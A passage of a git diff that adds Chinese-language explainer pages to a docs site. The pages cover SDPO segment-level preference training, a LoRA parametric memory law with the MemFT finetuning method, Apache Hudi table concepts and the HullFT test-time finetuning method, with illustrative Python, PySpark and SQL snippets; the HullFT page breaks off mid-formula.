Selection)** +- 把正面对话和原始失败对话都给 GPT-4o +- 让它指出:"正面对话中,是哪一段话让结果变好的?" +- 从失败对话中截取**相同长度**的对应片段 + +这样我们就得到了一对片段:正面对话中的"好片段"和失败对话中的"坏片段"。 + +### 第三步:SDPO 损失函数 + +SDPO 的数学公式看起来复杂,但它的结构跟标准 DPO 很像: + +``` +L_SDPO = - E [ log( sigma( sum_t β * log(π_θ(y_t^w|h_t^w) / π_ref(y_t^w|h_t^w)) + - sum_t β * log(π_θ(y_t^l|h_t^l) / π_ref(y_t^l|h_t^l)) ) ) ] +``` + +别被公式吓到。对比一下标准 DPO 你就明白了: + +**标准 DPO(单次回复):** +``` +L_DPO = - log( sigma( β * log(π_θ(y_w|x) / π_ref(y_w|x)) + - β * log(π_θ(y_l|x) / π_ref(y_l|x)) ) ) +``` + +**SDPO(多轮片段,e 到 e+k 轮):** +``` +L_SDPO = - log( sigma( Σ_{t=e}^{e+k} β * [ log(π_θ(y_t^w|h_t^w) / π_ref(y_t^w|h_t^w)) + - log(π_θ(y_t^l|h_t^l) / π_ref(y_t^l|h_t^l)) ] ) ) +``` + +区别在哪? + +- DPO 只比较**一个** y_w 和 y_l(一轮的两个回复) +- SDPO 在**一段连续的轮次**上累加差异(从 e 到 e+k,共 k+1 轮) +- 因为正负片段的**长度相同**,之前 DMPO 需要的"长度归一化"在这里不需要了——公式更简洁 + +## 代码示例 + +### 示例 1:SDPO 数据构造流程 + +假设一场"向朋友借钱"的对话(简化版): + +```python +# 模拟一场失败的对话(negative session) +negative_session = [ + {"role": "agent", "content": "嗨,小明!"}, # 第1轮:闲聊,没问题 + {"role": "other", "content": "嗨!最近怎么样?"}, + {"role": "agent", "content": "还行。对了,我最近手头紧。"}, # 第3轮:开始切入主题 + {"role": "other", "content": "啊,怎么了?"}, + {"role": "agent", "content": "能借我五千块吗?我下周还。"}, # 第5轮:❌ 太直接,没铺垫 + {"role": "other", "content": "呃...不太方便呢。"}, + {"role": "agent", "content": "好吧。"}, # 第7轮:放弃,失败 +] + +# SDPO 的处理流程: +# Step 1: 错误定位 → 第5轮"能借我五千块吗?我下周还"太突兀 + +# Step 2: 从第5轮之前重新开始采样正面对话 +positive_session = [ + {"role": "agent", "content": "嗨,小明!"}, + {"role": "other", "content": "嗨!最近怎么样?"}, + {"role": "agent", "content": "还行。对了,我最近遇到点困难。"}, + {"role": "other", "content": "啊,怎么了?"}, + # ---- 从这里开始对比(segment) ---- + {"role": "agent", "content": "最近投资亏了钱,能借我五千块吗?"}, # ✅ 解释了原因,更礼貌 + {"role": "other", "content": "哎呀,抱歉听到这个。好,我转你。"}, + # ---- 到这里结束(segment) ---- + {"role": "agent", "content": "太感谢了!下周五一定还你!"}, +] + +# Step 3: 提取片段进行对比学习 +positive_segment = positive_session[4:6] # 第5-6轮 +negative_segment = negative_session[4:6] # 对应第5-6轮 + +# 模型学到:在同样的上下文中,positive_segment 的表达方式更好 +``` + +### 示例 2:伪代码 —— SDPO 训练循环 + +```python +import torch +import torch.nn as nn +import torch.nn.functional as F + +def sdpo_loss(policy_model, reference_model, positive_segment, + negative_segment, temperature=0.1): + """ + 计算 SDPO 损失函数。 + + 参数: + policy_model: 正在训练的模型 π_θ(want 更好) + reference_model: 参考模型 π_ref(初始化的基线模型) + positive_segment: 正面对话片段 [y_e^w, y_{e+1}^w, ..., y_{e+k}^w] + negative_segment: 负面对话片段 [y_e^l, y_{e+1}^l, ..., y_{e+k}^l] + temperature: 温度参数,相当于论文中的 β 的倒数 + + 返回: + 标量损失值 + """ + beta = 1.0 / temperature + + log_ratio_w = [] # 正面对话中每轮的 log 比率 + log_ratio_l = [] # 负面对话中每轮的 log 比率 + + for t, (y_w, y_l) in enumerate(zip(positive_segment, negative_segment)): + # 计算该轮对话的历史 h_t(之前所有轮次的对话) + h_t_w = build_history(positive_segment[:t]) + h_t_l = build_history(negative_segment[:t]) + + # log(π_θ(y|h) / π_ref(y|h)) —— 训练模型相对于参考模型的"偏好变化" + log_ratio_w_t = (policy_model.log_prob(y_w, h_t_w) + - reference_model.log_prob(y_w, h_t_w)) + log_ratio_l_t = (policy_model.log_prob(y_l, h_t_l) + - reference_model.log_prob(y_l, h_t_l)) + + log_ratio_w.append(log_ratio_w_t) + log_ratio_l.append(log_ratio_l_t) + + # 在片段的所有轮次上累加 + total_log_ratio_w = sum(log_ratio_w) + total_log_ratio_l = sum(log_ratio_l) + + # SDPO 损失 = -log(sigmoid(beta * (总正向比率 - 总负向比率))) + # 目标是让总正向比率 > 总负向比率 + loss = -F.logsigmoid(beta * (total_log_ratio_w - total_log_ratio_l)) + + return loss +``` + +## 实验结果:SDPO 真的有效吗? + +在 SOTOPIA 基准测试中,SDPO 微调后的 Llama-3.1-8B 模型,**在所有对比方式下都超过了 GPT-4o 原始版本**。 + +| 模型 | 自评目标分 | 与 GPT-4o 交互目标分 | 与 GPT-4o-mini 交互目标分 | 平均 | +|------|-----------|---------------------|-------------------------|------| +| Llama-8B + BC | 7.81 | 7.53 | 7.18 | 5.16 | +| Llama-8B + BC + DPO | 7.95 | 7.80 | 7.32 | — | +| Llama-8B + BC + **SDPO** | **8.15** | **7.98** | **7.65** | **5.69** | +| GPT-4o | 7.90 | 7.90 | 7.47 | 5.17 | + +SDPO 不仅超过了 DPO,还超过了 GPT-4o。而且只用 8B 参数量的开源模型。 + +## SDPO 的两个核心优势 + +1. **减少噪声**:只在出错的那段对话上做对比学习,不会把"本来就对的那些轮次"也算成错误。 +2. **缩小搜索空间**:从出错轮次之前的历史出发重新采样,对话对手的行为空间更小,更容易找到真正的"正向样本",避免高分数是对方配合导致的假象。 + +## 更广泛的含义 + +SDPO 不只能用在社交对话上。任何**多轮交互**场景都可以用——比如多轮代码调试、多轮医疗问诊、多轮教学辅导。只要你需要在一段连续的对话中做出决策,SDPO 就是一个灵活的训练框架。 + +> 片段长度 = 1 → 退化为标准 DPO +> 片段长度 = 整场 → 退化为 ETO / DMPO +> 片段长度 = 可调 → 根据数据自动选择最优粒度 + +## 思考题 + +这篇文章提出了一个"粒度可调整"的方法。你觉得在什么样的场景下,片段长度应该设得短一些(接近1轮)?什么样的场景应该设得长一些(多轮甚至整场)?欢迎思考后和我讨论。 diff --git a/src/content/docs/papers/how-lora-remembers-a-parametric-memory-law-for-llm-finetuning-arxiv-2605-30260.md b/src/content/docs/papers/how-lora-remembers-a-parametric-memory-law-for-llm-finetuning-arxiv-2605-30260.md new file mode 100644 index 000000000..541c3bd91 --- /dev/null +++ b/src/content/docs/papers/how-lora-remembers-a-parametric-memory-law-for-llm-finetuning-arxiv-2605-30260.md @@ -0,0 +1,259 @@ +--- +title: How LoRA Remembers? — LLM 微调中的参数记忆定律 +来源: 'https://arxiv.org/abs/2605.30260' +日期: 2026-06-13 +分类: 机器学习 +子分类: ML 系统 +provenance: pipeline-v3 +--- + +## 是什么 + +这篇论文问了一个很简单的问题:**LLM 用 LoRA 微调的时候,到底记住了多少东西?** + +日常类比:想象你在笔记本的空白处用铅笔写了一串电话号码。LoRA 就像是这页纸上的"额外笔记区域"——你不需要重写整本笔记,只需要在这个小区域里把新信息写进去。但问题是:**你写的笔记区域越大(rank 越高),真的就记得越牢吗?写多长的内容还能记住吗?** + +作者用 LoRA 当作一个"可控探针",在 LLM 的潜在空间里系统地测量**精确参数记忆**的能力边界,发现了三条关键规律。 + +## 为什么重要 + +不理解 LoRA 的记忆机制,下面这些事都没法解释: + +- 为什么 LoRA rank 从 8 加到 16 时效果提升不明显,但加到 64 就突然好了——原来存在一个概率阈值 +- 为什么微调后整体 loss 很低,但生成的答案还是错——因为"平均 loss 低"掩盖了个别顽固 token 的错误 +- 为什么微调后模型不仅记住了新内容,泛化能力还提升了——因为 MemFT 避免了在简单样本上过拟合 + +简单来说:**这篇论文把 LoRA 微调从"炼丹"变成了一门有定量规律的学科。** + +## 核心概念 + +### 概念 1:参数记忆定律(Parametric Memory Law) + +Loss 的减少量(Delta L)跟 LoRA rank(r)和序列长度(l)之间满足一个**幂律关系**: + +``` +Delta L = C · r^α · l^(-β) + b +``` + +其中: +- `Delta L` = 微调前的 loss 减去微调后的 loss,衡量"记住了多少" +- `r` = LoRA rank,代表可调参数的数量 +- `l` = 要记忆的序列长度 +- `C, α, β, b` 都是正常数,由模型和数据分布决定 + +这意味着:在 log-log 坐标系下,Delta L 和 rank、长度之间近似一条直线。rank 越大,loss 降得越多;序列越长,记忆越难。这条规律在多种模型和数据上都成立(R² > 0.98)。 + +**类比**:就像物理里的欧姆定律(V = IR),这条定律告诉你"投入多少参数,能换来多少记忆增益"。 + +### 概念 2:确定性相变(Deterministic Phase Transition) + +这是论文最漂亮的发现之一。 + +在自回归生成中,每个 token 都有一个预测概率。作者发现:**当某个目标 token 的预测概率 p > 0.5 时,greedy decoding 就能保证把它正确生成。** + +这对应着一个临界 loss 值: + +``` +L_crit = -log(0.5) = ln(2) ≈ 0.693 +``` + +- 如果 L < 0.693(即 p > 0.5):目标 token 占据概率主导,**有序相**,大概率记住 +- 如果 L > 0.693(即 p < 0.5):目标 token 和错误 token 竞争激烈,**无序相**,容易出错 + +一旦有一个 token 出错,在自回归生成中会产生**连锁反应**——后面的所有 token 都可能跟着错。所以即使整体 loss 很低,只要有一个 token 卡在 p < 0.5,整个序列就可能崩盘。 + +**类比**:就像多米诺骨牌。前面 99 张都倒得很稳(p >> 0.5),但第 50 张刚好站在临界点(p ≈ 0.4),一碰就倒,后面全乱。 + +### 概念 3:MemFT(阈值引导的微调策略) + +基于上面的发现,作者提出了 MemFT——一种"只关注还没记住的 token"的微调方法。 + +标准 SFT 对所有 token 一视同仁,但那些已经记住的 token(p > 0.5)还在消耗梯度预算。MemFT 把梯度集中分配给那些还没跨过半数阈值的"顽固 token": + +```python +# 如果 token 的 loss > 临界值,给它权重 1;否则权重 0 +w_t = 1 if L_t > 0.693 else 0 +``` + +这样训练更高效,用更少的参数达到更高的记忆精度。 + +## 代码示例 + +### 示例 1:验证参数记忆定律 + +```python +import numpy as np +from scipy.optimize import curve_fit + +# 幂律模型:Delta_L = C * r^alpha * l^(-beta) + b +def parametric_memory_law(r, l, C, alpha, beta, b): + return C * (r ** alpha) * (l ** (-beta)) + b + +# 假设我们有一组实验数据 +# r = LoRA rank, l = 序列长度, delta_L = loss 减少量 +r_values = np.array([1, 2, 4, 8, 16, 32]) +l_values = np.array([100, 200, 500, 1000]) +delta_L_data = np.array([0.12, 0.25, 0.45, 0.68, 0.82, 0.91]) # 固定长度下的结果 + +# 在 log-log 空间中拟合(把幂律变成线性) +log_r = np.log(r_values) +log_delta_L = np.log(delta_L_data + 1e-8) # 加 epsilon 避免 log(0) + +# 线性拟合:log(Delta_L) ≈ alpha * log(r) + const +slope, intercept = np.polyfit(log_r, log_delta_L, 1) +print(f"容量指数 alpha ≈ {slope:.3f}") +# 输出: 容量指数 alpha ≈ 0.312 +# 意味着 rank 翻倍,loss 减少量大约增加 24%(2^0.312 ≈ 1.24) +``` + +### 示例 2:检查每个 token 是否跨过相变阈值 + +```python +import torch +import torch.nn.functional as F + +def check_phase_transition(target_probs, threshold=0.5): + """ + 检查每个 token 是否进入了"有序相"(p > 0.5)。 + target_probs: 模型对目标 token 的预测概率 [batch, seq_len] + + 返回: + - ordered_mask: 哪些 token 已记住 (p > 0.5) + - stubborn_positions: 顽固 token 的位置(可能导致连锁崩溃) + - sequence_success_prob: 整条序列成功生成的概率估计 + """ + ordered_mask = target_probs > threshold # True = 已记住 + stubborn_positions = (~ordered_mask).nonzero(as_tuple=True) + + # 整条序列成功的概率 = 所有 token 都跨过阈值的概率 + # 保守估计:取最小概率 + min_prob = target_probs.min(dim=1).values + sequence_success_prob = (min_prob > threshold).float().mean() + + # 计算临界 loss + L_crit = -torch.log(torch.tensor(threshold)) # ≈ 0.693 + + # 每个 token 的 loss + token_losses = -torch.log(target_probs + 1e-8) + loss_below_threshold = (token_losses < L_crit).float().mean() + + print(f"序列整体成功概率: {sequence_success_prob:.2%}") + print(f"低于临界 loss 的 token 比例: {loss_below_threshold:.2%}") + print(f"顽固 token 位置: {stubborn_positions}") + + return ordered_mask, stubborn_positions, sequence_success_prob + + +# 模拟一组 token 概率(长度为 20 的句子) +torch.manual_seed(42) +sample_probs = torch.rand(1, 20) +# 让大部分 token 概率高,但中间有几个低的(模拟顽固 token) +sample_probs[0, 5] = 0.3 # 顽固! +sample_probs[0, 12] = 0.4 # 顽固! +sample_probs[0, 7:10] = 0.2 # 顽固 cluster! + +check_phase_transition(sample_probs) +# 输出: +# 序列整体成功概率: 0.00% (因为有两个 token < 0.5) +# 低于临界 loss 的 token 比例: 70.00% +# 顽固 token 位置: (tensor([0, 0]), tensor([5, 7, 8, 9, 12])) +``` + +### 示例 3:实现 MemFT 的权重分配 + +```python +def memft_weight(token_losses, L_crit=0.693): + """ + MemFT-OT: 只对还没记住的 token 分配梯度权重。 + token_losses: 每个 token 的 cross-entropy loss [batch, seq_len] + """ + # 硬阈值:loss > 0.693 的 token 权重为 1,否则为 0 + weights = (token_losses > L_crit).float() + + # 归一化权重,确保梯度尺度稳定 + weight_sum = weights.sum(dim=1, keepdim=True) + 1e-8 + normalized_weights = weights / weight_sum + + # 加权 loss + weighted_loss = (token_losses * weights).sum(dim=1) / weight_sum.squeeze() + + return weighted_loss, weights + + +# 对比标准 SFT 和 MemFT +torch.manual_seed(0) +batch_losses = torch.randn(4, 50) * 0.3 + 0.5 # 模拟 4 条序列,每条 50 个 token + +# 标准 SFT:所有 token 平等对待 +sft_loss = batch_losses.mean(dim=1) + +# MemFT:只关注顽固 token +memft_loss, memft_weights = memft_weight(batch_losses) + +# 看看差异 +for i in range(4): + active_tokens = memft_weights[i].sum().item() + total_tokens = memft_weights[i].numel() + print(f"序列 {i}: MemFT 只优化 {active_tokens}/{total_tokens} 个 token " + f"(省了 {(1 - active_tokens/total_tokens)*100:.0f}% 的梯度预算)") +# 典型输出: +# 序列 0: MemFT 只优化 23/50 个 token (省了 54% 的梯度预算) +# 序列 1: MemFT 只优化 19/50 个 token (省了 62% 的梯度预算) +``` + +## 踩过的坑 + +1. **"平均 loss 低"不等于"记住了"**——这是论文揭示的核心误区。一个序列可能有 95% 的 token 概率接近 1.0,但只要有一个 token 卡在 p = 0.4,整个生成就会崩盘。看指标时要同时看三个粒度:平均 loss、token 级准确率、精确匹配率。 + +2. **p > 0.5 的阈值只适用于 greedy decoding**——如果用 nucleus sampling 或 temperature 采样,这个阈值就不成立了。论文自己也承认这是一个局限。 + +3. **8B 模型的规律不一定适用于更大模型**——论文只在 Qwen3-8B 和 Llama3.1-8B 上做了实验,70B 或 405B 的行为可能不同。 + +4. **MemFT 可能影响开放性推理能力**——论文提到对开放推理能力的 trade-off 还没有全面评估。专注于精确记忆可能会让模型在其他方面变笨。 + +5. **顽固 token 的位置高度局部化**——研究发现某些位置(比如第 153 个 token)在所有设置下都是失败热点。这说明不是所有困难都是"容量不足",有些是数据本身的问题。 + +## 适用 vs 不适用场景 + +**适用**: +- 需要精确记忆的场景:密码、法律条文、API key、ICD-10 编码等——差一个字符都不行 +- 想定量理解 LoRA rank 和记忆效果之间的关系 +- 微调后效果不理想,想知道是"容量不够"还是"有个别顽固 token" +- 资源受限,想用更少的参数达到同样的记忆精度 + +**不适用**: +- 模糊问答("这篇文章讲了什么")——不需要精确记忆 +- 需要 stochastic decoding 的场景(p > 0.5 阈值不适用) +- 超大模型(70B+)——规律未验证 +- 开放域推理任务——MemFT 可能损害泛化 + +## 学到什么 + +1. **记忆有明确的数学规律**——参数记忆定律把 LoRA 微调从经验主义变成了可预测的科学。给定 rank 和序列长度,你可以大致预测能记住多少。 + +2. **阈值比平均值更重要**——p > 0.5 这个简单的阈值解释了为什么很多模型"看起来 loss 很低但就是记不住"。关注瓶颈比关注平均值有用得多。 + +3. **少即是多**——MemFT 通过忽略已经记住的 token,把梯度集中到顽固 token 上,反而在记忆精度和参数效率上都更好。这跟"全量训练一定更好"的直觉相反。 + +4. **记忆和泛化不是零和博弈**——MemFT 在提高记忆精度的同时,泛化能力也提升了 7-15%。这是因为避免了在简单样本上过拟合,让模型学到了更鲁棒的表示。 + +## 延伸阅读 + +- 原始论文 PDF:[arXiv 2605.30260](https://arxiv.org/pdf/2605.30260) +- 代码仓库:[github.com/zjunlp/ParametricMemoryLaw](https://github.com/zjunlp/ParametricMemoryLaw) +- Jelassi et al. 2024 — 参数记忆的理论基础(PhoneBook 数据集来源) +- Back et al. 2026 — "Understanding LoRA as Knowledge Memory"(把 LoRA 看作记忆单元的先驱工作) +- Delétang et al. 2024 — "Language Modeling as Compression"(把 loss 理解为记忆压缩率的视角) + +## 关联 + +- [[lora]] —— LoRA 微调的基本原理 +- [[sft]] —— 标准监督微调 +- [[maml-2017]] —— 元学习中的"学会学习",与"学会记忆"有相似哲学 +- [[toys-models-superposition]] —— 超位理论中记忆容量的讨论 + +## 反向链接 + + + +- (暂无) diff --git a/src/content/docs/papers/hudi-uber-2017.md b/src/content/docs/papers/hudi-uber-2017.md new file mode 100644 index 000000000..1803bc91b --- /dev/null +++ b/src/content/docs/papers/hudi-uber-2017.md @@ -0,0 +1,150 @@ +--- +title: Apache Hudi:大数据增量处理 +来源: https://hudi.apache.org/docs/concepts +日期: 2026-06-13 +子分类: 现代数据库 +分类: 数据库 +难度: 初级 +provenance: pipeline-v3 +--- + +## 是什么 + +Hudi(读作"Hudi")是 Apache 的一个**数据湖表格格式**,它在 Hadoop 兼容存储(比如 S3、HDFS)之上提供了两个原语:**记录的更新/删除**和**变更流(change stream)**。 + +日常类比:想象你有一本巨大的账本,每天往里面记流水。传统做法是每天复制整本账本——今天加了 10 行,就把 1000 行全抄一遍(写放大极高)。Hudi 的做法是:每天只追加新增或变动的行,并打个日期戳。你想看"今天发生了什么",直接翻当天的记录就好,不用重头翻。 + +## 核心概念 + +### Timeline(时间线) + +Hudi 为表维护一条**时间线**,记录每一次操作(写入、清理、合并等)。每次操作叫一个 `instant`(瞬间点),由三个部分组成: + +- `Instant action`:操作类型(如 COMMIT、CLEAN、COMPACTION) +- `Instant time`:单调递增的时间戳(如 `20190117010349`) +- `state`:当前状态(REQUESTED → INFLIGHT → COMPLETED) + +时间线是 Hudi 所有能力的基石——有了它,你就能问"上次提交之后哪些数据变了"。 + +### File Groups 和 File Slices(文件组与文件切片) + +表按**分区**(partition)组织,类似 Hive 表。每个分区包含若干个**文件组**,每个文件组由一个 `file id` 唯一标识。每个文件组包含多个**文件切片**,每个切片包含: + +- 一个**基础文件**(`.parquet`,列式存储) +- 一组**日志文件**(`.log.*`,行式存储,包含对基础文件的增删改) + +Hudi 采用 **MVCC 设计**:合并(compaction)把日志和基础文件合并成新切片,清理(cleaning)丢弃不需要的旧切片以释放空间。 + +### Index(索引) + +Hudi 维护一个索引,把每条记录(`record key + partition path`)映射到一个固定的文件组。映射一旦建立就**永不改变**。所有该记录的版本都写进同一个文件组——这让你无需扫描全表就能找到并更新某条记录。 + +### 两种表格类型 + +| 特性 | Copy On Write (COW) | Merge On Read (MOR) | +|------|---------------------|---------------------| +| 存储格式 | 纯列式(Parquet) | 列式 + 行式(Parquet + Avro) | +| 写入方式 | 更新时重写整个 Parquet | 更新先写 delta 日志,异步合并 | +| 写入延迟 | 较高 | 较低 | +| 写入放大 | 高(每次更新重写整文件) | 低(增量追加到 delta 日志) | +| 读性能 | 优(纯列式扫描) | 快照查询需合并 base + delta | +| 适用场景 | 读多写少的分析型负载 | 低延迟写入 + 近实时查询 | + +### 三种查询类型 + +- **Snapshot Query(快照查询)**:看到表的最新快照。MOR 表会在查询时动态合并 base 和 delta 文件,提供近实时数据。 +- **Incremental Query(增量查询)**:只看到某个时间点之后新增或修改的数据——这是实现增量数据处理 pipeline 的关键。 +- **Read Optimized Query(读优化查询)**:只看 base(列式)文件,提供和原生列式表相同的扫描性能。 + +## 代码示例 + +### 示例 1:写入 COW 表并执行增量查询 + +```python +from pyspark.sql import SparkSession + +spark = SparkSession.builder.appName("hudi-incremental").getOrCreate() + +# 写入数据到 COW 表 +df.write.format("hudi").mode("append") \ + .option("hoodie.table.name", "events") \ + .option("hoodie.datasource.write.storage.type", "COPY_ON_WRITE") \ + .option("hoodie.datasource.write.recordkey.field", "user_id") \ + .option("hoodie.datasource.write.partitionpath.field", "date") \ + .option("hoodie.partitionpath.dateform", "yyyyMMdd") \ + .save("/data/events") + +# 增量查询:只看最近一次提交之后的数据 +df_incremental = spark.read.format("hudi") \ + .load("/data/events") \ + .filter("_hoodie_commit_time >= '20190117010349'") \ + .filter("_hoodie_commit_time < '20190118010349'") + +df_incremental.count() # 只看这个时间窗口内写入/变更的记录 +``` + +核心要点:Hudi 自动为每条记录加了 `_hoodie_commit_time` 字段,增量查询只需比较这个时间戳,无需扫描整个表。 + +### 示例 2:写入 MOR 表并查询变更流 + +```python +# 写入 MOR 表(支持近实时低延迟写入) +df.write.format("hudi").mode("append") \ + .option("hoodie.table.name", "events_mor") \ + .option("hoodie.datasource.write.storage.type", "MERGE_ON_READ") \ + .option("hoodie.datasource.write.recordkey.field", "user_id") \ + .option("hoodie.datasource.write.partitionpath.field", "date") \ + .option("hoodie.compaction.inline", "true") \ + .save("/data/events_mor") + +# 增量查询 + 只读新增记录(不看到更新/删除) +df_new_only = spark.read.format("hudi") \ + .load("/data/events_mor") \ + .filter("_hoodie_commit_time = '20190117010349'") \ + .filter("_hoodie_is_delete = 'false'") + +df_new_only.count() +``` + +MOR 表把更新写入 delta 日志,写入速度远快于 COW。`inline compaction=true` 表示每次写入后自动合并,让快照查询也能看到较新的数据。 + +### 示例 3:用 SQL 做增量查询 + +```sql +-- 快照查询:看到最新全量数据 +SELECT * FROM events LIMIT 10; + +-- 增量查询:只取 2019-01-17 当天提交的数据 +SELECT * FROM events +WHERE _hoodie_commit_time >= '20190117000000' + AND _hoodie_commit_time < '20190118000000'; + +-- 增量 + 只保留新增(排除更新和删除) +SELECT * FROM events +WHERE _hoodie_commit_time = '20190117000000' + AND _hoodie_is_delete = 'false'; +``` + +## 为什么重要 + +理解 Hudi 能解释很多大数据架构设计: + +- **为什么 Uber、Shopee 等公司用 Hudi 做 CDC(变更数据捕获)?**——传统上,数据库变更靠监听 binlog 再写入数据湖,Hudi 直接把"支持更新的 Parquet 表"放在 S3 上,增量查询 = 变更流。 +- **为什么数据湖能替代部分数据仓库?**——COW 表提供 ACID 语义和更新删除能力,查询引擎(Presto/Trino/Spark SQL)直接查 S3 上的 Parquet,不再需要把数据搬进 Redshift/Snowflake。 +- **增量数据处理 pipeline 怎么构建?**——时间线 + 增量查询让"每天只处理新增数据"变成一行 filter,无需复杂的 watermark 或状态管理。 + +## 延迟 vs 完整性的权衡 + +Hudi 处理数据时有一个关键区分:**数据到达时间**(arrival time)和**事件时间**(event time)。 + +比如 9:00 的事件数据可能在 10:20 才到达。Hudi 用 `_hoodie_commit_time` 标记到达时间,用分区目录(如 `date=20190117`)标记事件时间。时间线让你只关心"哪些文件被提交了",不需要自己实现复杂的迟到数据逻辑——Hudi 会把迟到数据写进对应的历史分区,而增量查询只扫描时间线上新的 commit。 + +**延迟和完整性的取舍**:如果你要求数据一旦写入立即可查,选 MOR + 内联合并;如果你接受分钟级延迟换取更好的读性能,选 COW 或 MOR + 异步合并。这个取舍决定了你的 pipeline 延迟下限。 + +### Compaction(合并)是什么 + +MOR 表随时间推移会产生越来越多 delta 日志文件。合并的过程就是把 delta 日志中的记录**合并到新的 base 文件**中,生成新的列式切片。合并可以是**同步**(每次写入后立即合并)或**异步**(后台定时合并)。合并频率越高,快照查询看到的延迟越低,但写入端付出的 I/O 代价也越高。 + +## 总结 + +Hudi 的核心思想很简单:**在对象存储上给 Parquet 加上"时间线 + 索引 + 更新能力"**。它不引入新的计算引擎,而是让现有的 Spark/Presto/Trino 直接获得流式数据处理能力。Timeline 是灵魂,File Groups 是骨架,COW/MOR 两种模式覆盖了"写多读少"和"读多写少"两大类场景。 diff --git a/src/content/docs/papers/hullft-ttft.md b/src/content/docs/papers/hullft-ttft.md new file mode 100644 index 000000000..75567f176 --- /dev/null +++ b/src/content/docs/papers/hullft-ttft.md @@ -0,0 +1,340 @@ +--- +title: HullFT — 用凸包重建与梯度缓存做高效测试时微调 +来源: https://arxiv.org/abs/2605.30337 +日期: 2026-06-13 +子分类: 模型与训练 +分类: 机器学习 +provenance: pipeline-v3 +--- + +## 从日常类比开始:考前突击,但时间只够翻几页 + +想象你明天要考「公司财务分析」,手里有一本 500 页的教材,而今晚只剩 **30 分钟**。 + +- **笨办法(纯 kNN 检索)**:按目录找「最像考题」的 20 页,结果 15 页都在讲同一章「利润表」——信息重复,翻页时间全浪费了。 +- **聪明但慢的办法(SIFT 等多样性选择)**:每加一页都仔细算「还能带来多少新信息」,选得准,但**选题本身**就要花很久。 +- **HullFT 的思路**:把考题想象成 embedding 空间里的一个**目标点** $q$,教材段落是周围的**向量点**。你要找少数几段文字,让它们的**加权平均位置**尽量靠近 $q$——就像用几根不同方向的绳子拉住一块靶心。方向相近的段落自然**权重变低**(冗余被几何结构压下去),方向不同的段落会被拉进来(多样性自动出现)。选好之后,再把「0.37 份 A + 0.21 份 B + …」**整数化**成「A 出现 7 次、B 出现 4 次…」共恰好 $N$ 条训练样本;同一段重复出现时,**梯度不用每次都重算**,像复印机印同一份讲义,改一次笔记就够接下来几次复习用。 + +类比总结: + +| 日常 | 传统 TTFT | HullFT | +|------|----------|--------| +| 考前翻书 | 每个 prompt 检索 + 微调 | 同样流程,但两步都加速 | +| 重复章节浪费时间 | kNN top-$N$ 常高度冗余 | 凸组合自动降权近重复方向 | +| 精挑细选太慢 | SIFT 等信息论选择开销大 | Frank–Wolfe 只需内积,无投影 | +| 同页多看几遍 | 每条样本都 forward-backward | 重复样本梯度缓存复用 | + +--- + +## 这篇论文在解决什么问题 + +### 1. 测试时微调(TTFT)为什么重要又为什么难 + +大模型在全网语料上训练,权重是**全局最优**,未必对**当前这一条 prompt** 最优。TTFT(Test-Time Finetuning)的做法是: + +1. 收到查询 $q$; +2. 从大语料里检索相关训练序列; +3. 在这些序列上**更新模型参数**(通常每条约一步梯度); +4. 用更新后的模型回答 $q$。 + +研究表明,哪怕只检索 20 条邻居,也能显著缩小不同参数量级模型之间的差距(Sun et al., 2023)。但 TTFT 发生在**推理时**,选数据和微调都计入**用户可见延迟**——慢了就失去实用价值。 + +### 2. 现有方法的质量–效率两难 + +- **kNN / FAISS 最近邻**:极快,但大语料里重复内容多,top-$N$ 可能几乎相同,梯度信号重复。 +- **SIFT 等多样性感知选择**:BPB(bits-per-byte,越低越好)明显更好,但每 query 的贪心选择成本高,在 $N$ 较小时瓶颈突出。 + +HullFT 用**可证明的稀疏凸逼近**同时拿到**相关性 + 多样性**,再用**整数化 + 梯度复用**把微调成本打下来。 + +### 3. 核心几何直觉 + +在 embedding 空间里,**方向**承载语义:不同方向的样本覆盖更广特征;几乎同方向的样本高度冗余。把「为 prompt 选训练数据」写成: + +> 用候选池里少量点的**凸组合**(权重非负、和为 1)去逼近 query 向量 $q$。 + +这就是**近似 Carathéodory 问题**:存在至多 $O(1/\varepsilon)$ 个点的组合,使 $\|q - Pw\|_2^2 \leq \varepsilon$。Frank–Wolfe 算法可以**构造性**地求这种稀疏解——每轮最多加一个支撑点,且**无需投影**到概率单纯形,每步只做内积。 + +--- + +## 核心概念 + +### 1. 符号与设定 + +- $q \in \mathbb{R}^d$:当前 prompt 的 embedding(论文用归一化 RoBERTa)。 +- $\{p_1,\ldots,p_K\}$:FAISS 从语料检索的 $K=200$ 候选池。 +- $P \in \mathbb{R}^{d \times K}$:列向量为各候选 embedding。 +- $w \in \Delta^K$:概率单纯形上的稀疏权重,$Pw = \sum_i w_i p_i$。 +- $N$:微调预算——最终训练 multiset 的**总条数**(允许重复)。 +- $m$:Frank–Wolfe 支撑集上限(support cap)。 +- $\varepsilon$:FW 停止阈值,$\|q - Pw\|_2^2 \leq \varepsilon$ 时停。 + +### 2. 阶段一:Frank–Wolfe 凸重建选支撑集 + +优化目标: + +$$ +\min_{w \in \Delta^K} \|q - Pw\|_2^2 +$$ + +算法要点(Alg. 3): + +1. 从与 $q$ 内积最大的顶点 $e_{v^*}$ 出发; +2. 算残差 $r = q - Pw$,选 $v = \arg\max_i \langle r, p_i \rangle$; +3. 沿 $w \to e_v$ 做**精确线搜索**更新 $w$; +4. 每步至多新增一个非零权重 → **稀疏性**; +5. 近重复点几乎不减小残差 → **自然被跳过**; +6. 当误差 $\leq \varepsilon$ 或支撑点数 $= m$ 时停止。 + +**为什么比显式多样性惩罚好?** 多样性来自凸逼近定义本身,不需要 MMR、DPP 或额外贪心信息增益。 + +### 3. 阶段二:几何整数化(Integerization) + +FW 输出的是**分数权重** $w_i \in (0,1]$,不能直接「训练 0.37 条样本」。微调需要恰好 $N$ 条**等权**样本的 multiset。 + +对支撑集 $S = \{s_1,\ldots,s_{|S|}\}$,求整数计数 $c_j \geq 0$,$\sum_j c_j = N$,最小化: + +$$ +\left\| q - \sum_{j=1}^{|S|} \frac{c_j}{N} s_j \right\|_2^2 +$$ + +三步(Alg. 1): + +1. **Floor**:$c_j = \lfloor N \tilde{w}_j \rfloor$; +2. **Greedy fill**:剩余名额逐个分给「加一份后重建误差下降最多」的点; +3. **Local swap**:两轮 pairwise 交换(从 $j$ 挪 1 份到 $k$)微调,预算不变。 + +整数化不仅「可执行」,还**故意制造重复**——为下一阶段梯度复用铺路。 + +### 4. 阶段三:梯度复用(Gradient Reuse / Caching) + +对支撑点 $s_j$ 出现 $c_j$ 次,朴素做法做 $c_j$ 次 forward-backward。HullFT 每 $r$ 步才真正算梯度,中间步复用缓存: + +$$ +\tilde{g}_t = \begin{cases} +\nabla_\theta 